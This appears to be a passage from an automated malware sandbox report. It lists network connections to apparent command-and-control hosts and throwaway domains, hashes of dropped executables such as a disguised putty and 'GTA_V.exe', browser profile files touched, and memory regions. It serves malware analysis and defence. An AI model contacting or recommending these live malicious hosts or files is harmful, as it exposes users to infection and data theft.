US 8.8.8.8:53 2.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 1.206.142.95.in-addr.arpa udp
RU 5.42.66.10:80 5.42.66.10 tcp
RU 185.215.113.67:40960 tcp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 detailbaconroollyws.shop udp
US 172.67.193.11:443 detailbaconroollyws.shop tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
KR 221.143.49.222:80 221.143.49.222 tcp
US 104.21.74.118:443 horsedwollfedrwos.shop tcp
DE 136.243.76.170:135 tcp
US 8.8.8.8:53 patternapplauderw.shop udp
US 104.21.55.248:443 patternapplauderw.shop tcp
US 8.8.8.8:53 222.49.143.221.in-addr.arpa udp
US 8.8.8.8:53 248.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 understanndtytonyguw.shop udp
US 104.21.22.94:443 understanndtytonyguw.shop tcp
US 8.8.8.8:53 94.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 considerrycurrentyws.shop udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 104.21.28.32:443 considerrycurrentyws.shop tcp
US 8.8.8.8:53 32.28.21.104.in-addr.arpa udp
US 8.8.8.8:53 free.360totalsecurity.com udp
US 8.8.8.8:53 messtimetabledkolvk.shop udp
RU 5.42.65.116:50500 tcp
US 172.67.158.30:443 messtimetabledkolvk.shop tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 116.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 30.158.67.172.in-addr.arpa udp
US 8.8.8.8:53 deprivedrinkyfaiir.shop udp
US 104.21.25.251:443 deprivedrinkyfaiir.shop tcp
US 8.8.8.8:53 251.25.21.104.in-addr.arpa udp
US 8.8.8.8:53 relaxtionflouwerwi.shop udp
US 172.67.190.237:443 relaxtionflouwerwi.shop tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 ocsp.crlocsp.cn udp
CN 101.198.2.196:80 ocsp.crlocsp.cn tcp
US 8.8.8.8:53 lubriaceites.com udp
US 212.1.210.79:443 lubriaceites.com tcp
US 8.8.8.8:53 79.210.1.212.in-addr.arpa udp
DE 136.243.76.170:135 tcp
US 8.8.8.8:53 crl.crlocsp.cn udp
CN 180.163.251.149:80 crl.crlocsp.cn tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
DE 49.13.194.118:80 49.13.194.118 tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 8.8.8.8:53 ocsp.crlocsp.cn udp
US 101.198.193.5:80 ocsp.crlocsp.cn tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 5.193.198.101.in-addr.arpa udp
US 8.8.8.8:53 175.21.199.152.in-addr.arpa udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
DE 136.243.76.170:445 tcp
RU 5.42.65.67:48396 tcp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
DE 136.243.76.170:139 tcp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
US 8.8.8.8:53 sd.p.360safe.com udp
GB 99.86.249.221:80 sd.p.360safe.com tcp
CN 171.8.167.65:80 crl.crlocsp.cn tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
US 8.8.8.8:53 120.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 104.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 27.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 50.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 29.73.42.20.in-addr.arpa udp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 orion.ts.360.com udp
NL 82.145.215.156:443 orion.ts.360.com tcp
RU 91.215.85.135:80 91.215.85.135 tcp
US 8.8.8.8:53 ocsp.crlocsp.cn udp
CN 101.198.2.196:80 crl.crlocsp.cn tcp
US 101.198.193.5:80 ocsp.crlocsp.cn tcp
US 8.8.8.8:53 156.215.145.82.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 101.198.193.5:80 ocsp.crlocsp.cn tcp
US 8.8.8.8:53 beshomandotestbesnd.run.place udp
US 45.88.186.125:7000 beshomandotestbesnd.run.place tcp
US 8.8.8.8:53 125.186.88.45.in-addr.arpa udp
N/A 127.0.0.1:52407 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 api4.check-data.xyz udp
US 44.237.26.169:80 api4.check-data.xyz tcp
US 8.8.8.8:53 169.26.237.44.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 212.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 dcxZfVrOkE.dcxZfVrOkE udp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 5aa17e67da5390729352ed4a11da1990
SHA1 e47a79137c6fa29f5d3e4610cdfefaa7beb4e71e
SHA256 5962a7fff106f931b3337fe04db08fa73b386e2e2675895b37950d906971054e
SHA512 62596db2b42b1becae325f078f55d53dfb15f69eb72c559222602d3a688fd2327c73c36a4fb88924e77e36e869dbbeb075352fb8111e6479c7509681a923b6ae

\??\pipe\crashpad_748_HGVHDWTQEVDKMGAJ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 707d86571e1fa66f657f146c22eac81c
SHA1 bcfdab90abbc393679a9498931395bb6b714d259
SHA256 8a1e2446ae46ea48bfa7d7d22a64527f238ef5a22d3cd6265e33c7e0299f9942
SHA512 ca55ba3264ba992e64be53c3d730c1836f673ef6aef4a5e901ea7805cc4c7a968b9347a4f833ad7fe9b522f5b0c366d0f27793b676282df92b1eeedba1a88602

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3a3774f1e1dfa713e94367b732380ef6
SHA1 01e92aadf0615e89c79d28bdd428db2023ccc838
SHA256 6b5d732abd145f51f56b2a95ca65584c318b9378f1ad68b2491e95ba11113f07
SHA512 d3a316ab450fa137fe5a11b7dbe10b6e0da80c532e61eecec946ddd1712d973c9b1c35f9b374a43c91f2500fcc1575545b00d498429a5845c58c0e2c0bd9e034

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 e848fa92fe1d62b21d5253282567f648
SHA1 8b687fc65819f9f40269832a1a3c6f18b8444577
SHA256 747b6e0744a36b9b912019b6c32aac21574c2fe63c4864c28715f0ff7659b9e5
SHA512 df1e526d100ae701c16e519a1b51c74b26529452df72e5b108795870ff47efe1a7e50394118a87d0ddb7b8a3d87c37d560a9d5c54160f5ddd53b6e91b83582ab

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 780adb3243645be6504937c61b57d9b6
SHA1 16ee22c4c46750610c33ff836ab61438b6b668fb
SHA256 32eb6f8b7ea77b307041afcdd337bf54b91f17db9fb5b1d0f4213ed19e08b64c
SHA512 14121143d277885345fdce2a8c9dec8d7a3b9ca6f4a5ae7419ff775fd231ac9e0228f2d35a319b5b7740404ec1ab94de694374fa5d2a3c468c9cad9facb7090c

memory/336-177-0x00007FF9FB9B3000-0x00007FF9FB9B5000-memory.dmp

memory/336-176-0x00000000008E0000-0x00000000008E8000-memory.dmp

C:\Users\Admin\Desktop\a\volumeinfo.exe

MD5 e817cc929fbc651c5bdab9e8cca0d9d9
SHA1 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f
SHA256 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282
SHA512 a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f

memory/4564-189-0x00000000007E0000-0x0000000000A20000-memory.dmp

memory/4564-190-0x0000000005510000-0x000000000572C000-memory.dmp

memory/4564-191-0x0000000006860000-0x0000000006A7E000-memory.dmp

memory/4564-192-0x0000000007030000-0x00000000075D4000-memory.dmp

memory/4564-193-0x0000000006B20000-0x0000000006BB2000-memory.dmp

memory/4564-195-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-194-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-197-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-237-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-249-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-257-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-255-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-253-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-251-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-247-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-245-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-243-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-241-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-239-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-235-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-231-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-229-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-227-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-225-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-223-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-219-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-217-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-233-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-221-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-215-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-211-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-209-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-206-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-201-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-199-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-213-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-207-0x0000000006860000-0x0000000006A78000-memory.dmp

memory/4564-203-0x0000000006860000-0x0000000006A78000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7c7c63fb99b7621550cb034d76666d24
SHA1 478b7034698beddd03bf0542e92ce3386041bf57
SHA256 e1c8a5f6c2944ca244e8477a534afc073aba8e8d562ac4ca2d303e5e6e5a4b15
SHA512 55932db96894bc05cf5f6d285d69604a79124bfcee199d390ca6b9c321dab93f3031a4f8a38d85f05b36d2699953f14f983cd6f518e5084f55e96b2bfec302a3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 085064d16437307715ff3d7b49379b25
SHA1 250d7675e776aa739b4384d8d3d25ebd2c159959
SHA256 a86cd2400324c09420654e509c063fd9f5a465e3a9562012c4667b03a681c189
SHA512 cd9f4e3d1c5d0f24d55a145e6f7bcc8af8547c31f9969ff6589776a98989ae94076267144cdfb09599ed8d223b2f776675d6614cf8907be431320002d31ebb46

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58fc7c.TMP

MD5 cc9c4a413c2dc4c34c7927e8b2a1dd7c
SHA1 3fde38f285123676c89d1a755f3b5b1ada4b94ec
SHA256 be096340b9f012551aeb6ce7b5e533f415122bc76c391dc43f10f1d1db8c7872
SHA512 07d74b5051ae28f3e9bdf0e0b3d0443d7889dd0e27843783988cdacdf81c11bca821aea86be8580ac2e827a07b542dd7a4961bf06fcffc4ff54ad9f2c6a95b26

memory/4564-5109-0x0000000006C30000-0x0000000006C88000-memory.dmp

memory/4564-5110-0x0000000006C90000-0x0000000006CDC000-memory.dmp

C:\Users\Admin\Desktop\a\Zinker.exe

MD5 b11913361b2d4c43c00c1969184050a8
SHA1 8358fa3426e4136e0873a32f49f5f367770bad0a
SHA256 de39bc2c5f18ae468501a573ee5cb9b22f2f608ec2fc51954b44d4549fac2a57
SHA512 2d25c021ddf59a10b63c56d85a550e7454767444472f3e40662dda1e1dddeef551202253cf9137bf4054ed832cd59c53b66aba6d42361f044fe4e7b06bef2026

C:\Users\Admin\Desktop\a\smartsoftsignew.exe

MD5 dd7b3d075cc843de37f20545669216ba
SHA1 355fcbf44674f0380153aa07a704c10c1043d499
SHA256 9fda36eb2fdc5a0befb6021bdc1bdbecb843da8ff68eea84d418eaf47bebfbdc
SHA512 dbca5bb9c8c4b7cd2be52c9932dae0a4718874570d9a82ea5307edf6e7904f17f7aa5e60f1b2c0efe53c0116c4f623f89df98b203237d27f18b2895fad29a8c6

C:\Users\Admin\Desktop\a\smartsoftsignew.exe

MD5 66a5a529386533e25316942993772042
SHA1 053d0d7f4cb6e3952e849f02bbfbdb4d39021146
SHA256 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94
SHA512 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a

C:\Users\Admin\Desktop\a\ADServices.exe

MD5 0c2564813f2b9fc088cfb6938214d3cb
SHA1 cbb0bc2dfe83d38b9e4a8e47d182e6d7ee6a29b0
SHA256 1043faf46b5a19cbe10410e01725b38caf0db7f36b73c68e103ebca8da2d18d2
SHA512 06d4df2ed5d79c1d33ca06d977d936643c78139f484747bdfaac690b84f064620a6dc33014b0146acebce4e935688dc2a1445e7e2f830ec3b75e5e2dafa02ed1

C:\Users\Admin\AppData\Local\Temp\nsi1777.tmp\UAC.dll

MD5 adb29e6b186daa765dc750128649b63d
SHA1 160cbdc4cb0ac2c142d361df138c537aa7e708c9
SHA256 2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08
SHA512 b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada

C:\Users\Admin\AppData\Local\Temp\nsi1777.tmp\nsExec.dll

MD5 132e6153717a7f9710dcea4536f364cd
SHA1 e39bc82c7602e6dd0797115c2bd12e872a5fb2ab
SHA256 d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2
SHA512 9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1

C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat

MD5 f6423b02fa9b2de5b162826b26c0dc56
SHA1 01e7e79e6018c629ca11bc30f15a1a3e6988773e
SHA256 59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83
SHA512 5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459

memory/5504-5154-0x0000000002B90000-0x0000000002BC6000-memory.dmp

memory/5816-5155-0x000000001BBF0000-0x000000001C0BE000-memory.dmp

memory/5816-5156-0x000000001C170000-0x000000001C216000-memory.dmp

memory/5504-5157-0x0000000005480000-0x0000000005AA8000-memory.dmp

C:\Users\Admin\Desktop\a\New.exe

MD5 384cc82bf0255c852430dc13e1069276
SHA1 26467194c29d444e5373dfdde2ff2bca1c12ef9a
SHA256 ba2567627674eada0b5462b673cdea4ed11a063174c87b775927db7e7d6ef99c
SHA512 7838ee81a8d13c3722627424270ac877081afc399be862ce9b1614a1df3c12f98066d28f2a9a81bcf626f14fe90d83ef8039cd679f40851f2d6d83c3839e73be

memory/5424-5169-0x0000014218960000-0x000001421896A000-memory.dmp

memory/5504-5170-0x0000000005400000-0x0000000005422000-memory.dmp

memory/5504-5172-0x0000000005B90000-0x0000000005BF6000-memory.dmp

memory/5504-5171-0x0000000005B20000-0x0000000005B86000-memory.dmp

memory/5504-5178-0x0000000005C00000-0x0000000005F54000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yxq25wfj.r5x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

MD5 2de14d82238bf5395e0b95e551ab8e00
SHA1 f9c7f00ad7c624d190e06cda3c5adf02bb207074
SHA256 aa9d5004f89fe3952e5ee0b148e6a36574d372bb5ffadae5733a7ee77127f8d4
SHA512 9a5f2f781b52ea793021bf641a8be95f9611bfe936e9bd96978ec9066b4a7390b847f2e597cfd9ac69de9ac35b7238147538a23c3a27313d19c16258e2446f2a

memory/5504-5187-0x00000000061B0000-0x00000000061FC000-memory.dmp

memory/5504-5186-0x0000000006190000-0x00000000061AE000-memory.dmp

C:\Users\Admin\Desktop\a\GTA_V.exe

MD5 c7c4cf01397f037bc3f0b9a08d54b05c
SHA1 22f35045866e21261d16919dde62b9133db04263
SHA256 1e2a2fde956c86355da886f4cf2f0e53a5e9d3480e02da72ede7a6c62b6ca147
SHA512 e659f997fddcc4ed6322d1759a357c3babdd01108ff3b077f7e213f46ddb549873250ba7f5a55618ae72db8f5a1a0f7417e1d5c9aaae3948e3c91fa16dfad750

C:\Users\Admin\AppData\Local\Temp\{3ED45B86-B977-47bd-8150-2ED2A89934C6}.tmp\360P2SP.dll

MD5 fc1796add9491ee757e74e65cedd6ae7
SHA1 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812
SHA256 bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60
SHA512 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

memory/5504-5216-0x00000000079D0000-0x000000000804A000-memory.dmp

memory/5504-5217-0x00000000066A0000-0x00000000066BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini

MD5 e6edb41c03bce3f822020878bde4e246
SHA1 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA256 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA512 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 184a117024f3789681894c67b36ce990
SHA1 c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256 b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

memory/5424-5239-0x0000014232F60000-0x0000014232FC8000-memory.dmp

memory/1792-5243-0x0000000000400000-0x0000000000416000-memory.dmp

memory/4852-5255-0x00000230B23B0000-0x00000230B23D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{34FF3024-228D-4136-B51F-211E96B4C78E}.tmp

MD5 b1ddd3b1895d9a3013b843b3702ac2bd
SHA1 71349f5c577a3ae8acb5fbce27b18a203bf04ede
SHA256 46cda5ad256bf373f5ed0b2a20efa5275c1ffd96864c33f3727e76a3973f4b3c
SHA512 93e6c10c4a8465bc2e58f4c7eb300860186ddc5734599bcdad130ff9c8fd324443045eac54bbc667b058ac1fa271e5b7645320c6e3fc2f28cc5f824096830de1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

C:\Users\Admin\AppData\Local\Temp\putty.zip

MD5 188fbf5c7b5748e1f750be2bab44e0a0
SHA1 525afccfc532830f71f068acfbf9ac49a1463539
SHA256 14a23a25c21deba6f3a85d2e24085a95881302499bcdde6dc9a585fe46b9f370
SHA512 62d6232ec09e266585f29c9fe335a6f02cfc0dbd8aa02545b0648eec7424aa25c4138cff49015073aede2a45506c056cbaa592cfc5d3a537313d9ee5bf1c6608

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

MD5 7a9a33206f80078ba80f7a839cd92451
SHA1 55447378c48561c35bad1317b58a34ee50c5072f
SHA256 e53c379d95e95706c5a2c4d6cd609857368a3bf14f28d7e67f6e3f8dfce6d486
SHA512 61873ed9b7616de998eff2ca90c6698cb0df87d181344fc6e02fd70fcd87fd8028cfdb7f606a3637514463982c161549729145118190e42b7f47365716f23aba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 612a6c4247ef652299b376221c984213
SHA1 d306f3b16bde39708aa862aee372345feb559750
SHA256 9d8e24c91cff338e56b518a533cb2e49a2803356bbf6e04892fb168a7ce2844a
SHA512 34a14d63abb1e3fe0f9927a94393043d458fe0624843e108d290266f554018e6379cba924cb5388735abdd6c5f1e2e318478a673f3f9b762815a758866d10973

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56641592f6e69f5f5fb06f2319384490
SHA1 6a86be42e2c6d26b7830ad9f4e2627995fd91069
SHA256 02d4984e590e947265474d592e64edde840fdca7eb881eebde3e220a1d883455
SHA512 c75e689b2bbbe07ebf72baf75c56f19c39f45d5593cf47535eb722f95002b3ee418027047c0ee8d63800f499038db5e2c24aff9705d830c7b6eaa290d9adc868

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 81e385cee41834ed416c70f53b48ee3e
SHA1 bac345ee423336ac82eeae3701150d5050e5640a
SHA256 aac2a7e1a282e6c84d20c9d2cd4bff9b28407907c07656182f9d1ca518937d15
SHA512 5ab486669dbc4816adb28ef62189e530df53830c3366b9633a4e2e4d4b6ba1b490195b8d8c8964bc4f2c3a0ce3e4bcfb01a6e2e85672c2e8719adb5edeb0e096

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c2621ccf0395df8cb9f8b5dba8a7b0ad
SHA1 e232b7e7c08dc42c649a1eefe1c4aaf3797e7ef3
SHA256 3a0883b26780b773b6da85bf599c877bc0538f4e75e5e9182676a0d95eb955f1
SHA512 e7250c4e6dea103a1f08919e61a3ad23a9d244abe6694f6b3998561e4ed4df538a869f420e10ddfd0903a1d0e64e5f51601d9b4a86e629b9a330ea74a6bd457b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ab57ba256025997925e6ababd5da94c4
SHA1 a34c6f368c3e31a298cba09e07c39523b62f9e9f
SHA256 cd422024d1963c4aa2fe4529d66832dd836b1c0e7595d53d78913ea48a047c28
SHA512 7e84aff2870d3cd221cd3b098519e9de0402cf61698d5425a45d4c49acddf0ae3c59dc04c83dcb7865e6527929c3ac78a1d84012af2312168f1341f77b18fe79

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 f591eb72cb36a2c9fabbfbbda950a13e
SHA1 48e3b042c88ea5c5783aa5bab23feb9ab46aee31
SHA256 3036aa5facdea109e1b4c51df39b94a29c9362f8a40941ddf94f9f4ee1952a9d
SHA512 8726ad1b4d71b813476edaac6253d8df67d301d94c3d640bfbcb43fbf743fa53c80b377eb542940b54d2c679faf92f1e4dabefecfccbd17d230f27357c71d5b3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 251bd69ce269d247960c02360ba43baf
SHA1 0edf9779c521740acab427b16ef4ef4880059b71
SHA256 96d1604c532d9543262738e6caf401a5de71144ca757ec1e2d9dca17dd3d264e
SHA512 73374e8456ecf9a0f272c176decb9a2c9b2f4a3bb7fa2fde76ef2158a781f2da81cec9214abdab38719c8ada41659ed7dc84aab07df23a941775f08f614c5c33

memory/1792-5425-0x0000000005B30000-0x0000000005B3A000-memory.dmp

memory/1792-5429-0x0000000006770000-0x000000000680C000-memory.dmp

memory/1320-5432-0x000000001E590000-0x000000001E62C000-memory.dmp

memory/1320-5433-0x000000001E630000-0x000000001E692000-memory.dmp

memory/336-5438-0x00007FF9FB9B3000-0x00007FF9FB9B5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 dc0d7ca552512c3260b10acf8da96d15
SHA1 01a6c6e9b1676afbcd96bcf12643a42c09400152
SHA256 1a9d92fe1b3d45cee3ef4350a4ab9a6086abb8157c5570d38a7f67e856399f5e
